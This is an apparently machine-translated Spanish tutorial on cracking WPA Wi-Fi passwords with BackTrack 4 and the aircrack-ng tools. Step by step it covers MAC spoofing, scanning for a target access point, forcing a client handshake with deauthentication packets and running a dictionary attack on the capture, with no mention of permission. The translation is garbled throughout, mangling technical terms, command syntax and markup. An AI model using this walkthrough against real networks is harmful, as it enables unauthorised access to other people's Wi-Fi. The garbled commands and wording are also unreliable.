La mecánica del WPA es simple y directo, el mayor inconveniente es que debe tener la contraseña en su archivo de diccionario después de capturar el apretón de manos y debe haber una computadora conectada a la AP que desea comprometer. Estoy usando la computadora portátil de pavimento HP con una antena USB inalámbrica de Raylink, arrancé Bactrack 4 de CD y soy eady para comenzar.
Primero tengo que detener la tarjeta inalámbrica para poder manipular algunas configuraciones.
P> Airmon-ng Stop wlan0
(wlan0 es mi Atenna USB inalámbrica), si soy usura qué dispositivos tengo que ejecutaría
ifconfig -a
Para mostrarme todas las nic disponibles
ahora abajo la tarjeta inalámbrica escribiendo
ifconfig wlan0 down <// b>
Ahora estoy listo para asignar una dirección MAC falsa a mi dispositivo USB
MacChanger – – Mac 00: 11: 22: 33: 44: 55 <// b>
Puedo usar cualquier dirección MAC siempre que sea válida y caracteres, este es simplemente fácil de usar.
A continuación, debe identificar el BSSID y el canal del AP Desea romper
Airodump-Ng Wlan0
Esto le mostrará todos los AP dentro del rango de su tarjeta inalámbrica. La pantalla se verá como
BSSID PWR BEACIONS #DATA #/S CH MB ENC CIPHER AUTHSID
00: 1C: 58: AE: C3: 01 -60 124 1 0 1 54 WPA2 CCMP PSK Network
BSSID Station PWR Tasa de paquetes perdidos sonda
00: 1C: 58: AE: C3: 01 00: 1B: 66: AD: C6: 00 -57 0- 1 48 Network </ P>
Necesitará el BSSID y el canal para proceder al siguiente paso
Airodump -Ng -C 1 -W WPA1 – -BSSID 00: 1C: 58: AE: C3: 01 WLAN0
Este comando comienza a monitorear el tráfico en la AP específica y escribe la información recopilada en un archivo, en este ejemplo el archivo se llama WPA1. Este archivo se usa en Aircrack para descifrar la contraseña real
ahora abre un nuevo shell y estamos listos para capturar el apretón de manos entre una estación de trabajo y el ap.
Aireplay- Ng -0 10 -BSSID 00: 1C: 58: AE: C3: 01 -C 00: 1C: 58: AE: C3: 01 WLAN0
Este comando envía una reinseción del paquete de Deauth al AP y forzará un nuevo apretón de manos entre la estación de trabajo y el AP. Cuando lo captura, su pantalla Airodump con Muestra un mensaje en la parte superior diciendo que tiene el apretón de manos.
Ahora está listo para descifrar la contraseña, ahora puede detener tanto los proyectiles Airodump como Aireplay y abrir una final Nuevo caparazón. Por defecto, Backtrack 4 tiene un archivo de diccionario que puede usar, aunque sugiero modificarlo con contraseñas adicionales para un ataque más rico en características. Se encuentra debajo/Pentest/Wireless/Cowpatty y se llama dict. Puede navegar a él usando Konqueror o a través de la línea de comandos ahora en su nueva consola tipo en
Aircrack -NG WPA1 -W/Pentest/Wireless/Cowpatty/Dict
Ahora, si tiene la paseta en su archivo de dict, solo tomará unos momentos para la grieta y la contraseña que se muestra en la pantalla.
Muchos AP ahora cambian las contraseñas cada hora tienen claves WPA con valores de cifrado muy altos y hace que sea extremadamente difícil descifrar. En pocas palabras, si es una empresa y tiene WPA usando valores de cifrado muy altos, esto hace que sea casi imposible descifrar a menos que un profesional tenga horas y horas de tiempo y un archivo dict cientos de megabytes en tamaño.
Referencia:
- https: // remotexploit. org